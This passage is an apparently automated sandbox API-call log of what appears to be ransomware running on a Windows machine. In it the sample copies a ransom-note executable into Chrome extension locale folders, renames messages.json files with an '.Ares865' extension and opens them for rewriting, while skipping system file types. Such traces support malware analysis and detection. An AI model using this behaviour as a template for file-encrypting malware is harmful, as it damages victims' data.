hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=324) returned 1 [0100.844] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr" [0100.844] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr" [0100.844] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.844] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.845] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.845] GetLastError () returned 0x0 [0100.845] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.845] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2ec3c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2ec3c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.845] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.845] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.846] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.846] lstrlenW (lpString="messages.json") returned 13 [0100.846] lstrlenW (lpString="Ares865") returned 7 [0100.846] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.846] lstrlenW (lpString=".dll") returned 4 [0100.846] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.846] lstrlenW (lpString=".lnk") returned 4 [0100.846] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.846] lstrlenW (lpString=".ini") returned 4 [0100.846] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.846] lstrlenW (lpString=".sys") returned 4 [0100.846] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.846] lstrlenW (lpString="messages.json") returned 13 [0100.846] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.Ares865") returned 160 [0100.846] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.847] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.848] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=295) returned 1 [0100.851] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl" [0100.851] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl" [0100.851] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.851] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.852] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.852] GetLastError () returned 0x0 [0100.852] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.852] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2ec3c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2ec3c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.852] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.852] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.852] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.852] lstrlenW (lpString="messages.json") returned 13 [0100.852] lstrlenW (lpString="Ares865") returned 7 [0100.852] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.853] lstrlenW (lpString=".dll") returned 4 [0100.853] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.853] lstrlenW (lpString=".lnk") returned 4 [0100.853] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.853] lstrlenW (lpString=".ini") returned 4 [0100.853] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.853] lstrlenW (lpString=".sys") returned 4 [0100.853] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.853] lstrlenW (lpString="messages.json") returned 13 [0100.853] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.Ares865") returned 160 [0100.853] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.855] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.855] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=234) returned 1 [0100.860] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk" [0100.860] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk" [0100.860] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.860] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.861] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.861] GetLastError () returned 0x0 [0100.862] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.862] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e312520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e312520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.862] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.862] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.862] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.862] lstrlenW (lpString="messages.json") returned 13 [0100.862] lstrlenW (lpString="Ares865") returned 7 [0100.862] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.862] lstrlenW (lpString=".dll") returned 4 [0100.862] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.862] lstrlenW (lpString=".lnk") returned 4 [0100.862] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.862] lstrlenW (lpString=".ini") returned 4 [0100.862] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.862] lstrlenW (lpString=".sys") returned 4 [0100.862] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.862] lstrlenW (lpString="messages.json") returned 13 [0100.862] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.Ares865") returned 160 [0100.863] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.864] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.865] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=222) returned 1 [0100.868] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se" [0100.868] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se" [0100.868] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.868] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.869] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.869] GetLastError () returned 0x0 [0100.869] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.869] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e312520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e312520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.869] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.869] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.870] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.870] lstrlenW (lpString="messages.json") returned 13 [0100.870] lstrlenW (lpString="Ares865") returned 7 [0100.870] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.870] lstrlenW (lpString=".dll") returned 4 [0100.870] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.870] lstrlenW (lpString=".lnk") returned 4 [0100.870] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.870] lstrlenW (lpString=".ini") returned 4 [0100.870] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.870] lstrlenW (lpString=".sys") returned 4 [0100.870] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.870] lstrlenW (lpString="messages.json") returned 13 [0100.870] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.Ares865") returned 160 [0100.870] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.871] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.872] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=210) returned 1 [0100.875] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru" [0100.875] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru" [0100.876] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.876] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.876] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.876] GetLastError () returned 0x0 [0100.877] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.877] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e312520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, 